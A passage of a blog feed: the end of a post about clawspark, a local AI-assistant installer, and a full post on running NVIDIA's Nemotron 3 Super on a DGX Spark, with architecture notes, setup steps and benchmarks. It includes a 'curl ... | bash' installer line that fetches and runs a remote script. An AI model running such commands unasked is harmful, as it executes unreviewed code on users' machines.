<p><strong>Mention routing.</strong> In WhatsApp groups, @mentions get resolved to JIDs (WhatsApp internal user IDs). The bot's JID might not match its linked phone number's JID in all cases. The early return in mention detection (bug #7) means the bot never sees @mentions in groups unless you patch the code.</p>
<p>clawspark applies all three patches automatically and re-applies them after updates (since <code>npm update</code> overwrites the dist files). Groups require @mention to activate, and the agent is restricted to Q&amp;A only in group context. Full tool access is reserved for direct messages with the owner.</p>
<p>Voice notes work through the local-whisper skill, which runs Whisper (OpenAI's open-source speech-to-text model) locally on the GPU. On DGX Spark, it uses the large-v3 model for maximum transcription accuracy. On Jetson, it drops to the small model. On RTX, it scales based on available VRAM. The audio never leaves your machine.</p>
<h2>Skills</h2>
<p>clawspark installs 10 skills by default, verified against the OpenClaw skill registry:</p>
<table>
<thead>
<tr>
<th>Category</th>
<th>Skills</th>
</tr>
</thead>
<tbody><tr>
<td>Core</td>
<td>local-whisper, self-improvement, memory-setup</td>
</tr>
<tr>
<td>Voice</td>
<td>whatsapp-voice-chat-integration-open-source</td>
</tr>
<tr>
<td>Productivity</td>
<td>deep-research-pro, agent-browser</td>
</tr>
<tr>
<td>Knowledge</td>
<td>second-brain, proactive-agent</td>
</tr>
<tr>
<td>Web Search</td>
<td>ddg-web-search, local-web-search-skill</td>
</tr>
</tbody></table>
<p>Web search works without any API keys. The agent uses DuckDuckGo Lite via web_fetch, fetches result URLs, and composes answers from the content. No Brave API key, no Google API key, no external dependencies.</p>
<p>You can add or remove skills with <code>clawspark skills add &lt;name&gt;</code> and <code>clawspark skills remove &lt;name&gt;</code>. The skills.yaml file in your config directory is the source of truth, and <code>clawspark skills sync</code> reads it and installs everything.</p>
<h2>Getting Started</h2>
<p><strong>Tested and verified on DGX Spark.</strong> Should also work on Mac (Apple Silicon M1/M2/M3/M4), RTX desktops, and Jetson. The installer has fallbacks for all platforms -- macOS uses Homebrew, Ollama runs natively on Apple Silicon, and llmfit handles model selection. These platforms have not been end-to-end tested yet. Community testing welcome -- open an issue if you try it on different hardware.</p>
<pre><code class="language-bash">curl -fsSL https://clawspark.dev/install.sh | bash
</code></pre>
<p>Or with specific options:</p>
<pre><code class="language-bash">bash install.sh --model=qwen3.5:122b-a10b --messaging=whatsapp
</code></pre>
<p>After installation:</p>
<pre><code class="language-bash">clawspark status      # Check all components
clawspark benchmark   # Run a performance benchmark
clawspark logs        # Tail the gateway logs
clawspark restart     # Restart all services
clawspark update      # Update OpenClaw and re-apply patches
clawspark airgap on   # Enable air-gap mode
</code></pre>
<p>The web UI is at <code>http://localhost:18789/__openclaw__/canvas/</code>. The metrics dashboard is at <code>http://localhost:8900</code>.</p>
<p>Source code and documentation: <a href="https://clawspark.dev">clawspark.dev</a></p>
<h2>What is Next</h2>
<p>A few things I am working on:</p>
<p><strong>Multi-model routing.</strong> Use the fast 35B model for simple queries and automatically route complex reasoning tasks to the 122B model. The hardware can handle both loaded simultaneously since 128GB is enough for both.</p>
<p><strong>Better metrics.</strong> ClawMetry currently shows basic gateway stats. I want per-query latency tracking, token usage by model, and cost-equivalent comparisons (how much this query would have cost on cloud APIs).</p>
<p><strong>More hardware testing.</strong> The Jetson and RTX paths in clawspark are written and should work (hardware detection, llmfit model selection, Ollama setup), but I have only done full end-to-end testing on DGX Spark. Jetson AGX Orin is next. For RTX desktops, open a terminal and run the install command directly -- no SSH needed. If you try it on your hardware, please open an issue with your results.</p>
<p><strong>Upstream patches.</strong> The three source patches I wrote are necessary because of bugs in OpenClaw's compiled code. Ideally these get fixed upstream so the patches become unnecessary. I plan to submit them.</p>
<h2>Closing Thoughts</h2>
<p>Two years ago, running a capable AI model locally meant a server rack, a cooling system, and deep knowledge of CUDA. Today it means a quiet box on your desk and a bash script.</p>
<p>The gap between local and cloud AI is closing fast. Not because local is getting as fast as cloud (dedicated data center hardware will always win on raw throughput), but because local is getting good enough. 59 tokens per second from a 35B-parameter MoE model on a desktop machine is good enough for a personal assistant. The tradeoff is straightforward: you get complete data privacy and zero ongoing cost in exchange for slightly higher latency.</p>
<p>clawspark is just the glue. It takes hardware that is already capable (DGX Spark), software that is already good (OpenClaw, Ollama), a model that is already smart (Qwen 3.5), and a tool selector that actually knows your hardware (llmfit), and removes the friction between them. The one-click part is not the innovation. The innovation is all the edge cases, patches, and defaults that make it actually work when you run it for the first time on real hardware.</p>
<p>If you have a DGX Spark, an RTX GPU, a Mac with Apple Silicon, or a Jetson, give it a try. One command, a few questions, and you have a private AI assistant that genuinely never phones home.</p>
<hr />
<p><em>GitHub:</em> <a href="https://github.com/saiyam1814/claw-spark"><em>github.com/saiyam1814/claw-spark</em></a> <em>Website:</em> <a href="https://clawspark.dev"><em>clawspark.dev</em></a></p>
]]></content:encoded></item><item><title><![CDATA[Here's What I Learned About Nemotron 3 Super -I Ran a 120B Parameter Model on Nvidia DGX Spark]]></title><description><![CDATA[There’s a moment when you’re watching a model load into memory. The progress bar is filling up to 87 gigabytes and it hits you. You’re about to talk to something that has 120 billion parameters. Not t]]></description><link>https://blog.kubesimplify.com/nemotron3-on-dgx-spark</link><guid isPermaLink="true">https://blog.kubesimplify.com/nemotron3-on-dgx-spark</guid><category><![CDATA[nemotron 3]]></category><category><![CDATA[nemotron]]></category><category><![CDATA[DGXSpark]]></category><category><![CDATA[NVIDIA]]></category><category><![CDATA[ai agents]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Sat, 14 Mar 2026 12:44:36 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/6f7096fe-54a1-4e2e-aacc-184cb109d071.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>There’s a moment when you’re watching a model load into memory. The progress bar is filling up to 87 gigabytes and it hits you. You’re about to talk to something that has 120 billion parameters. Not through an API. Not in the cloud. On a box the size of a sandwich sitting next to your keyboard.</p>
<p>That’s what running NVIDIA’s Nemotron 3 Super on the DGX Spark feels like. After spending time with it, I think this model needs more attention than it’s getting. Not because of one benchmark number, but because of the engineering choices behind it. These choices show you exactly where AI inference is going.</p>
<p>Let me walk you through what I found.</p>
<h3><strong>The Headline Numbers (And Why They’re Misleading)</strong></h3>
<p>When NVIDIA drops a model, they lead with the big stats: 120 billion parameters, 1 million token context, 5x throughput. These numbers are real, but they hide the real story.</p>
<p>The number that actually matters is <strong>12.7 billion</strong>. That’s how many parameters fire per token. Out of 120.6 billion total, only about a tenth light up for any given input. The rest sit there, waiting until the right token needs their skill.</p>
<p>This roughly 10:1 ratio is the whole story. It’s why the model runs on desktop hardware. It’s why it’s fast. It’s why NVIDIA built it this way. Everything else follows from this one design choice.</p>
<p>The second thing that matters is the layer mix. The model has 88 layers total. Most of them are Mamba-2 layers. This is a completely different architecture from transformers and it doesn’t need to store growing key-value caches. Only a small number are traditional transformer attention layers. NVIDIA interleaves them in a repeating pattern: groups of Mamba-2 blocks paired with Latent MoE layers, with attention layers placed at key depths. We’ll come back to why this split is so important.</p>
<h3><strong>Three Architectures in a Trenchcoat</strong></h3>
<p>Nemotron 3 Super isn’t one architecture. It’s three, stacked together so each one does what it’s best at. Once you get this stack, you get why the model works the way it does.</p>
<img src="https://pbs.twimg.com/media/HDSdda-bcAA0LrZ?format=jpg&amp;name=large" alt="" style="display:block;margin:0 auto" />

<h3><strong>Mamba-2: The Workhorse</strong></h3>
<p>The majority of the 88 layers are Mamba-2 blocks. Mamba is a state-space model. Think of it like a recurrent architecture that keeps a compact, fixed-size state and updates it as each new token comes in.</p>
<p>The key thing: Mamba runs in <strong>linear time</strong>. Double the sequence length, you roughly double the compute. Compare that with transformer attention, where doubling the sequence quadruples the compute.</p>
<p>This is why Nemotron 3 Super can actually deliver a 1-million-token context window in practice. With most layers being Mamba, the bulk of the model doesn’t care how long your prompt is. Compute grows linearly, and memory doesn’t grow at all. Mamba’s state stays the same size no matter the sequence length.</p>
<h3><strong>Transformer Attention: The Precision Tool</strong></h3>
<p>A small number of layers in the stack are traditional transformer attention layers, using Grouped Query Attention with 32 query heads, 2 KV heads, and a head dimension of 128. These are confirmed specs from the technical report.</p>
<p>Why keep any attention at all? Because Mamba has a known gap. It struggles with precise associative recall, like connecting a specific detail from position 1,000 with something at position 500,000. The fixed-size state means some info gets compressed away over very long sequences.</p>
<p>NVIDIA’s fix: place attention layers at carefully chosen depths through the 88-layer stack. They act like precision tools, handling the long-range connections that Mamba would miss, while Mamba does everything else fast.</p>
<p>The result: the vast majority of the model’s compute happens in linear time. Quadratic attention is used only where it’s needed.</p>
<h3><strong>The KV Cache Payoff</strong></h3>
<p>This design has a huge side effect that matters a lot for hardware like the DGX Spark.</p>
<p>In a transformer, the KV cache grows with sequence length. Every attention layer stores key and value tensors for every token it has seen. For a model like Qwen 3.5-122B with 12 full attention layers, head dimension 256, and 2 KV heads, that adds up to about 22.9 GiB at 1 million tokens in BF16. (The math: 12 layers x 2 KV heads x 256 dim x 2 bytes x 2 for K+V x 1M tokens.)</p>
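<p>The same calculation as a small Python sketch, using the Qwen figures quoted above. The helper name <code>kv_cache_bytes</code> is illustrative, and "1 million tokens" is taken as 10^6 here, which is what reproduces the 22.9 GiB figure.</p>
<pre><code class="language-python">def kv_cache_bytes(attn_layers, kv_heads, head_dim, tokens, bytes_per_value=2):
    """KV cache size: one K and one V tensor per attention layer per token."""
    per_token = attn_layers * kv_heads * head_dim * bytes_per_value * 2  # x2 for K and V
    return per_token * tokens


GIB = 1024 ** 3

# Qwen 3.5-122B figures from the paragraph above, BF16 (2 bytes per value).
qwen = kv_cache_bytes(attn_layers=12, kv_heads=2, head_dim=256, tokens=1_000_000)
print(f"{qwen / GIB:.1f} GiB")  # 22.9 GiB
</code></pre>
<p>If you count a million tokens as 2^20 instead, the same function returns exactly 24 GiB. To get the Nemotron 3 Super number, call it with head dimension 128, 2 KV heads, and the model's attention-layer count.</p>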
<img src="https://substackcdn.com/image/fetch/$s_!w9U0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac671316-de89-4a33-b0e6-c80cc8fdfebf_2048x1365.jpeg" alt="Image" style="display:block;margin:0 auto" />

<p>Nemotron 3 Super has far fewer attention layers, each with head dimension 128 and 2 KV heads. Because Mamba layers use a fixed-size state (no KV cache growth), only the attention layers add to the KV cache. The bottom line: the KV cache is roughly <strong>3x smaller</strong> than Qwen’s at the same context length. On the DGX Spark’s 128 GB of unified memory, you load the 87 GB model, add a relatively small KV cache even at very long contexts, and you still have plenty of room to spare.</p>
<p>For practical purposes, the KV cache almost doesn’t matter with this model.</p>
<h2><strong>Latent MoE: Getting 4x More Experts for Free</strong></h2>
<p>The Mixture of Experts layer is where things get really clever.</p>
<img src="https://substackcdn.com/image/fetch/$s_!5Kdw!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F89ffec61-5e59-42db-b9f3-d7943928265b_2048x1365.jpeg" alt="Image" style="display:block;margin:0 auto" />

<p>In a standard MoE, each token is routed to one or two “expert” sub-networks from a larger pool. The idea is simple: different experts specialize in different things, and the router learns which expert to call for each token.</p>
<p>The problem is cost. Routing happens at the model’s full hidden dimension, and each expert operates at that same dimension. If you want more experts (for better specialization), routing gets more expensive. If you want to activate more experts per token (for better accuracy), inference gets slower.</p>
<p>Latent MoE solves this with a compression trick. Before routing, token embeddings are projected from the full hidden dimension down to a smaller latent dimension. The router operates in this compressed space, which is much cheaper. Experts also operate on the compressed representations.</p>
<p>The compute you save on compression doesn’t disappear. It gets reinvested. NVIDIA uses it to increase both the total number of experts <strong>and</strong> the number of experts active per token by the same factor. The result: 4x more experts consulted per token, at approximately the same inference cost as a standard MoE with fewer experts.</p>
<p>Each token effectively gets a committee of 4 specialists deliberating instead of a single expert making a snap judgment. The accuracy improvement is significant, and you don’t pay for it in latency.</p>
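<p>A back-of-the-envelope sketch of why the trade works, under loudly stated assumptions: each expert is modeled as two matrices, the latent dimension is a quarter of the hidden dimension, and the expert width and baseline expert count are hypothetical values picked for illustration. Only the 4096 hidden size comes from this post (the embedding length in the <code>ollama show</code> output). This is not NVIDIA's actual configuration.</p>
<pre><code class="language-python">def expert_macs(active_experts, d_in, d_ff):
    """Multiply-accumulates per token spent inside the routed experts.

    Each expert is modeled as two matrices: d_in x d_ff and d_ff x d_in.
    """
    return active_experts * 2 * d_in * d_ff


HIDDEN = 4096     # embedding length reported by `ollama show`
LATENT = 1024     # assumed 4x compression of the hidden dimension
D_FF = 2048       # hypothetical expert width
BASE_ACTIVE = 2   # hypothetical experts per token in a standard MoE

standard = expert_macs(BASE_ACTIVE, HIDDEN, D_FF)
latent = expert_macs(4 * BASE_ACTIVE, LATENT, D_FF)
projection = 2 * HIDDEN * LATENT  # shared down- and up-projection around the experts

print(standard == latent)    # same expert cost with 4x the active experts
print(projection / latent)   # relative overhead of the two projections
</code></pre>
<p>In this toy setup the expert cost is identical while four times as many experts are consulted. The shared projections add a fixed overhead, which shrinks relative to the expert cost as experts get wider or more of them are active.</p>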
<h2><strong>Multi-Token Prediction: Built-In Speculative Decoding</strong></h2>
<p>Standard language models predict one token at a time. Generate position N, feed it back in, generate position N+1, repeat. This sequential nature is the fundamental bottleneck in text generation speed.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/e115fb71-9ad5-4d6c-abbc-2a36fe6f6559.png" alt="" style="display:block;margin:0 auto" />

<p>Nemotron 3 Super predicts multiple future tokens from each position simultaneously. The model has shared-weight prediction heads that project from the same internal representation to predict not just the next token, but several tokens ahead.</p>
<p>This serves two purposes. During training, it forces the model to learn longer-range dependencies. You can’t predict three tokens ahead without understanding the broader context. This makes the model smarter.</p>
<p>During inference, it works like built-in speculative decoding. Instead of generating one token per forward pass, the model proposes multiple tokens, verifies them, and keeps the correct ones. For structured output like code and tool calls, where the next few tokens are often very predictable, NVIDIA reports up to 3x wall-clock speedup. General chat won’t see the full 3x, but code generation benefits a lot.</p>
<p>The nice thing: you don’t need a separate draft model. The speculation is built right into the model.</p>
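<p>To make the "propose, verify, keep" step concrete, here is a minimal sketch of the generic greedy acceptance rule used in speculative decoding. It is not NVIDIA's implementation: <code>accept_draft</code> is a hypothetical helper, and the token lists are hand-written stand-ins for what the prediction heads and the full forward pass would produce.</p>
<pre><code class="language-python">def accept_draft(draft_tokens, verified_tokens):
    """Greedy verification: keep draft tokens until the first disagreement.

    verified_tokens[i] is the full model's choice at position i, computed in
    one pass over the draft. It has one more entry than the draft, which acts
    as a bonus token when every guess is accepted.
    Returns the tokens committed in this step.
    """
    committed = []
    for drafted, verified in zip(draft_tokens, verified_tokens):
        if drafted != verified:
            committed.append(verified)  # replace the first wrong guess and stop
            return committed
        committed.append(drafted)
    committed.append(verified_tokens[len(draft_tokens)])  # all accepted: bonus token
    return committed


# Predictable output: all three guesses hold, so four tokens land in one step.
print(accept_draft(["def", "main", "("], ["def", "main", "(", ")"]))
# Less predictable output: the second guess is wrong, so only two tokens land.
print(accept_draft(["def", "run", "("], ["def", "main", "(", ")"]))
</code></pre>
<p>Every step commits at least one token, so the worst case matches ordinary decoding. The gain comes from how often the guesses hold, which is why structured output benefits most.</p>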
<h2><strong>How It Was Trained: The Three-Phase Pipeline</strong></h2>
<p>This is where NVIDIA’s openness really shines. They didn’t just release weights. They published the complete methodology, and the numbers are big.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/8961cc5a-2e77-4316-a388-efb33cccadf9.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Phase 1: Pretraining.</strong> 25 trillion tokens total (10 trillion unique), plus 10 billion additional tokens focused specifically on reasoning, plus 15 million coding problems. The majority of compute ran in NVFP4, which is NVIDIA’s native 4-bit floating point format. This is unusual and important: most models train in higher precision and quantize down later, losing accuracy. Nemotron 3 Super was born in FP4.</p>
<p><strong>Phase 2: Supervised Fine-Tuning.</strong> 7 million carefully selected samples from a corpus of 40 million. Coverage spans reasoning, instruction following, coding, safety, and critically, multi-step agent task completion. This phase is where the model learns to be useful, not just knowledgeable.</p>
<p><strong>Phase 3: Reinforcement Learning.</strong> 1.2 million environment rollouts across 21 different configurations, using NeMo Gym and NeMo RL frameworks with 37 datasets. This is where the model learns to reason through complex, multi-step problems. This is the kind of thinking that makes it useful as an autonomous agent.</p>
<p>NVIDIA released around 10 of the pretraining datasets publicly, 15 RL training environments, and about 10 of the 37 RL datasets, along with complete training recipes. The Artificial Analysis Openness Index scored this release at 83 out of 100. Only two research labs (Ai2 and MBZUAI) score higher, and their models aren’t anywhere near this performance level.</p>
<p>This kind of transparency is new for a model this good. With enough compute, you could follow their recipe and reproduce the training run yourself.</p>
<h2><strong>Why NVIDIA Built This for Agents</strong></h2>
<p>The model wasn’t designed for chatbots. Every architectural decision points toward one use case: long-running autonomous agents. The 1M context, the sparse activation, the MoE efficiency. All of it.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/b0f51fa2-0d6e-4ec0-b839-ba0927fb91e7.png" alt="" style="display:block;margin:0 auto" />

<p>When you run a multi-agent system, token consumption explodes. Each agent interaction requires sending the full conversation history, tool outputs, intermediate reasoning steps, and results from other agents. NVIDIA’s numbers suggest multi-agent workflows generate up to 15x more tokens than standard chat.</p>
<p>This creates two problems that kill most models:</p>
<p><strong>Context overflow.</strong> At 128K tokens, even large models run out of context in extended agent sessions. The agent either loses early context (and the original goal with it), or you implement complex summarization/RAG schemes that lose fidelity. Nemotron 3 Super’s million-token window means the agent can hold the entire workflow state. Every tool call, every intermediate result, every reasoning step stays in memory without ever truncating.</p>
<p><strong>The cost of thinking.</strong> Agents need to reason at every step. If each reasoning call costs as much as a full 120B forward pass, running thousands of agent subtasks gets very expensive very fast. With only 12B active parameters, each call through Nemotron 3 Super costs a fraction of what a dense 120B model would. You get the intelligence of a large model with the economics of a small one.</p>
<p>The benchmarks back this up. On PinchBench, which tests models as actual coding agents (not just answering coding questions), it scores 85.6%. That’s the best open model out there. On DeepResearch Bench, which tests multi-step research over large document sets, NVIDIA’s AI-Q multi-agent system took the number one position. AI-Q is built on top of a fine-tuned Nemotron 3 Super. Worth noting: AI-Q is a full multi-agent system with orchestrator, planner, and researcher sub-agents. It’s not just the base model running solo. But Nemotron 3 Super is the reasoning engine at its core.</p>
<h2><strong>Why Sparse MoE is Perfect for the DGX Spark</strong></h2>
<p>Here’s something that sounds wrong: on the DGX Spark, a 120B MoE model runs way faster than a smaller 70B dense model. The bigger model is faster. How?</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/a316513a-2122-4da5-a635-cba89aa8e443.png" alt="" style="display:block;margin:0 auto" />
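<p>One common explanation, sketched here as a rough ceiling rather than a benchmark: single-user token generation tends to be limited by memory bandwidth, because every active weight has to be read once per token. The sketch assumes 4-bit weights (0.5 bytes per parameter) and ignores KV cache and activation traffic. The 70B dense model is a hypothetical comparison point, and 273 GB/s is the DGX Spark's unified memory bandwidth.</p>
<pre><code class="language-python">def decode_ceiling_tok_s(active_params_billions, bandwidth_gb_s, bytes_per_param=0.5):
    """Upper bound on tokens/s if every active weight is read once per token."""
    gb_read_per_token = active_params_billions * bytes_per_param
    return bandwidth_gb_s / gb_read_per_token


SPARK_BANDWIDTH_GB_S = 273  # DGX Spark unified memory bandwidth

moe = decode_ceiling_tok_s(12.7, SPARK_BANDWIDTH_GB_S)  # 120B MoE, 12.7B active
dense = decode_ceiling_tok_s(70, SPARK_BANDWIDTH_GB_S)  # hypothetical 70B dense model
print(f"MoE ceiling: {moe:.0f} tok/s, dense ceiling: {dense:.0f} tok/s")
</code></pre>
<p>Under these assumptions the ceilings come out at about 43 tok/s for the MoE and about 8 tok/s for the dense model. Real throughput lands below the ceiling, but the ratio shows why the bigger sparse model can still be the faster one: what counts is the weights touched per token, not the weights stored.</p>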

<h2><strong>Running It: Three Paths from Zero to Inference</strong></h2>
<p>I tested three ways to get Nemotron 3 Super running on the DGX Spark. Here they are, from simplest to most configurable.</p>
<p><strong>Path 1: Ollama (Two Commands)</strong></p>
<p>The fastest possible path. If Ollama is installed on your Spark (it comes pre-installed on DGX OS):</p>
<pre><code class="language-text">ollama pull nemotron-3-super

ollama run nemotron-3-super
</code></pre>
<pre><code class="language-text">saiyam@spark-5385:~$   ollama pull nemotron-3-super
pulling manifest 
pulling 0fc53cc990a2: 100% ▕███████████████████████████████████████████████████████████████████████████████████████▏  86 GB                         
pulling d02d998e5ae6: 100% ▕███████████████████████████████████████████████████████████████████████████████████████▏  23 KB                         
pulling 02897ca0d6a3: 100% ▕███████████████████████████████████████████████████████████████████████████████████████▏   31 B                         
pulling 9c35241878aa: 100% ▕███████████████████████████████████████████████████████████████████████████████████████▏  509 B                         
verifying sha256 digest 
writing manifest 
success 


saiyam@spark-5385:~$ ollama list

NAME                       ID              SIZE     MODIFIED               
nemotron-3-super:latest    95acc78b3ffd    86 GB    Less than a second ago    
qwen3.5:35b-a3b            3460ffeede54    23 GB    5 days ago                
saiyam@spark-5385:~$  ollama run nemotron-3-super --verbose "Explain the difference between Mamba and Transformer architectures like I'm a DevOps engineer who has never worked with ML."
</code></pre>
<pre><code class="language-text">ollama show nemotron-3-super 
  Model
    architecture        nemotron_h_moe    
    parameters          123.6B            
    context length      262144            
    embedding length    4096              
    quantization        Q4_K_M            
    requires            0.17.1            

  Capabilities
    completion    
    tools         
    thinking      

  Parameters
    temperature    1       
    top_p          0.95    

  License
    NVIDIA Software and Model Evaluation License                                            
    IMPORTANT NOTICE – PLEASE READ AND AGREE BEFORE USING THE NVIDIA LICENSED MATERIALS.    
    ...                                                                                     
</code></pre>
<p><strong>Real performance on DGX Spark:</strong></p>
<pre><code class="language-text">prompt eval rate:  3.51 tokens/s
eval rate: 19.50 tokens/s
eval count:  2504 tokens
total duration:  2m56s
</code></pre>
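<p>As a quick sanity check, the calculation below splits the total run time into generation time and everything else. It is only arithmetic on the figures above. Attributing the remainder to model load and prompt processing is my assumption, not something Ollama reports in this form.</p>
<pre><code class="language-python"># Figures copied from the ollama --verbose output above
eval_count = 2504            # generated tokens
eval_rate = 19.50            # generated tokens per second
total_seconds = 2 * 60 + 56  # total duration of 2m56s

# Time spent purely on generating the answer
generation_seconds = eval_count / eval_rate

# Whatever is left (assumed: model load plus prompt evaluation)
other_seconds = total_seconds - generation_seconds

print(f"generation: {generation_seconds:.1f}s, other: {other_seconds:.1f}s")
</code></pre>
<p>Roughly 128 of the 176 seconds went into producing tokens, so for long answers the eval rate is the number that dominates the wait.</p>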
<p><strong>Path 2: llama.cpp from Source (Full Control)</strong></p>
<p>If you want more control over context sizes, quantization, and API serving, you can build llama.cpp from source and run the GGUF model directly. Unsloth has a detailed guide for this: <a href="https://docs.unsloth.ai/basics/nvidia-nemotron-3-super">Unsloth Nemotron 3 Super Guide</a></p>
<p>The key things to know for DGX Spark:</p>
<ul>
<li><p>When building llama.cpp, pass <code>-DCMAKE_CUDA_ARCHITECTURES="121"</code> for the GB10 chip. Without this you’ll fall back to CPU inference.</p>
</li>
<li><p>The GGUF files are at <a href="https://huggingface.co/unsloth/NVIDIA-Nemotron-3-Super-120B-A12B-GGUF">unsloth/NVIDIA-Nemotron-3-Super-120B-A12B-GGUF</a> on Hugging Face.</p>
</li>
<li><p>NVIDIA recommends temperature 1.0 for general chat, and 0.6 with top_p 0.95 for tool calling.</p>
</li>
<li><p>Set <code>--ctx-size</code> based on your available memory. On DGX Spark, values from 16384 to 262144 are practical. Setting it to 1M may trigger a CUDA out-of-memory (OOM) error.</p>
</li>
<li><p>llama-server gives you an OpenAI-compatible API, so tools such as VS Code Continue, LangChain, CrewAI, and Open WebUI can talk to it directly.</p>
</li>
</ul>
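<p>To make the last point concrete, here is a minimal sketch of a client for llama-server's OpenAI-compatible chat endpoint, using only the Python standard library. The base URL (llama-server's default port 8080 on localhost) and the model label are assumptions for illustration. The sampling values come from the list above, with top_p for general chat taken from the <code>ollama show</code> defaults earlier in this post.</p>
<pre><code class="language-python">import json
import urllib.request

# Sampling settings from the list above (top_p for chat is an assumption
# based on the ollama show defaults)
GENERAL_CHAT = {"temperature": 1.0, "top_p": 0.95}
TOOL_CALLING = {"temperature": 0.6, "top_p": 0.95}


def build_payload(prompt, tool_calling=False):
    """Build an OpenAI-style chat completion request body."""
    sampling = TOOL_CALLING if tool_calling else GENERAL_CHAT
    return {
        "model": "nemotron-3-super",  # placeholder label, assumed
        "messages": [{"role": "user", "content": prompt}],
        **sampling,
    }


def chat(prompt, base_url="http://localhost:8080"):
    """POST the prompt to llama-server and return the reply text."""
    request = urllib.request.Request(
        f"{base_url}/v1/chat/completions",
        data=json.dumps(build_payload(prompt)).encode("utf-8"),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(request) as response:
        body = json.load(response)
    return body["choices"][0]["message"]["content"]
</code></pre>
<p>With llama-server running, <code>print(chat("Explain EndpointSlices in two sentences."))</code> should return the model's answer. Nothing in the script contacts the server until <code>chat</code> is called.</p>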
<h2><strong>The DGX Spark: Quick Hardware Context</strong></h2>
<p>For readers unfamiliar with the hardware, the DGX Spark is NVIDIA’s desktop AI computer. The relevant specs:</p>
<ul>
<li><p><strong>Chip:</strong> GB10 Grace Blackwell Superchip</p>
</li>
<li><p><strong>Memory:</strong> 128 GB unified LPDDR5x (shared CPU/GPU, 273 GB/s)</p>
</li>
<li><p><strong>GPU:</strong> 6,144 CUDA cores, 5th-gen Tensor Cores, 1 PFLOP FP4 sparse</p>
</li>
<li><p><strong>CPU:</strong> 20-core ARM (10x Cortex-X925 + 10x Cortex-A725)</p>
</li>
<li><p><strong>Size:</strong> 150mm x 150mm x 50mm, 1.2 kg</p>
</li>
<li><p><strong>Power:</strong> 240W</p>
</li>
</ul>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/d8e3fd38-2ef8-488a-b7f4-676d1edd7880.png" alt="" style="display:block;margin:0 auto" />

<p>The unified memory is the key. Unlike a discrete GPU where you’re limited by VRAM (24 GB on an RTX 4090, 32 GB on an RTX 5090), the DGX Spark’s 128 GB is coherently shared between CPU and GPU with no PCIe bottleneck. The full model, roughly 86 GB as pulled by Ollama above, lives in one address space.</p>
<p>NVIDIA rates it for models up to 200 billion parameters on a single unit, or 405 billion on two connected Sparks.</p>
<h2><strong>Putting It in Context: How Nemotron 3 Super Compares</strong></h2>
<p>Here’s the honest comparison against peers, based on published third-party benchmarks:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/354ed625-31cf-4636-950a-438ef99234d1.png" alt="" style="display:block;margin:0 auto" />

<h3><strong>What I’d Actually Use This For</strong></h3>
<p>After spending time with the model, here’s where I see genuine value in the Nemotron + DGX Spark combination:</p>
<p><strong>OpenClaw.</strong> I plan to use this as the model behind OpenClaw, which is already running on my machine.</p>
<p><strong>Private data analysis.</strong> If you work in healthcare, finance, legal, or defense, some data simply cannot leave your building. No cloud provider promise changes the rules. A local model that never touches a network is the only option for these workloads.</p>
<p><strong>Code review and analysis.</strong> 73.4% precision on Qodo’s code review benchmark means about three out of four issues it flags are real. That’s useful enough for a local code review helper, especially when you’re working on code you can’t send to an external API.</p>
<p><strong>Long-document reasoning.</strong> The million-token context with a tiny KV cache means you can load entire codebases, spec documents, or stacks of research papers and ask questions across everything. No chunking, no RAG pipeline needed. Just load it all and ask.</p>
<p>Where I wouldn’t use it: production serving at scale, real-time latency-critical applications, or model training. The DGX Spark is an inference machine, not a training rig.</p>
<h3><strong>The Bigger Picture</strong></h3>
<p>Nemotron 3 Super is interesting as a model, but it’s even more interesting as a strategy.</p>
<p>NVIDIA makes the chips (GB10, B200), the inference runtime (NIM, TensorRT-LLM), the training framework (NeMo), and now the models (Nemotron). They’ve released the model, the data, and the recipes. Everything except the hardware to train on.</p>
<p>That’s the play. The more developers build on Nemotron, the more they need NVIDIA hardware. The openness isn’t charity. It’s ecosystem building.</p>
<p>But for us as practitioners, the result is clearly good. We get a top-tier model with full training transparency, running on hardware we can put on a desk. The hybrid Mamba-Transformer architecture with Latent MoE and multi-token prediction isn’t just a research paper. It’s a practical solution for running large models on limited hardware.</p>
<p>NVIDIA has confirmed that Ultra, the bigger sibling at roughly 500 billion parameters, is coming. If Super at 120B is this capable, Ultra will be worth watching closely.</p>
<p>Sources:</p>
<ul>
<li><p><a href="https://research.nvidia.com/labs/nemotron/files/NVIDIA-Nemotron-3-Super-Technical-Report.pdf"><strong>NVIDIA Nemotron 3 Super Technical Report (PDF)</strong></a></p>
</li>
<li><p><a href="https://developer.nvidia.com/blog/introducing-nemotron-3-super-an-open-hybrid-mamba-transformer-moe-for-agentic-reasoning/"><strong>NVIDIA Technical Blog: Introducing Nemotron 3 Super</strong></a></p>
</li>
<li><p><a href="https://blogs.nvidia.com/blog/nemotron-3-super-agentic-ai/"><strong>NVIDIA Blog: 5x Higher Throughput for Agentic AI</strong></a></p>
</li>
<li><p><a href="https://artificialanalysis.ai/articles/nvidia-nemotron-3-super-the-new-leader-in-open-efficient-intelligence"><strong>Artificial Analysis: Nemotron 3 Super — The New Leader in Open Intelligence</strong></a></p>
</li>
<li><p><a href="https://www.qodo.ai/blog/nvidia-nemotron-3-super-is-closing-the-gap-for-open-source-models/"><strong>Qodo: Code Review Analysis</strong></a></p>
</li>
<li><p><a href="https://ollama.com/blog/dgx-spark"><strong>Ollama DGX Spark Benchmarks</strong></a></p>
</li>
<li><p><a href="https://lmsys.org/blog/2025-10-13-nvidia-dgx-spark/"><strong>DGX Spark Performance (LMSYS)</strong></a></p>
</li>
<li><p><a href="https://www.pinchbench.com/"><strong>PinchBench</strong></a></p>
</li>
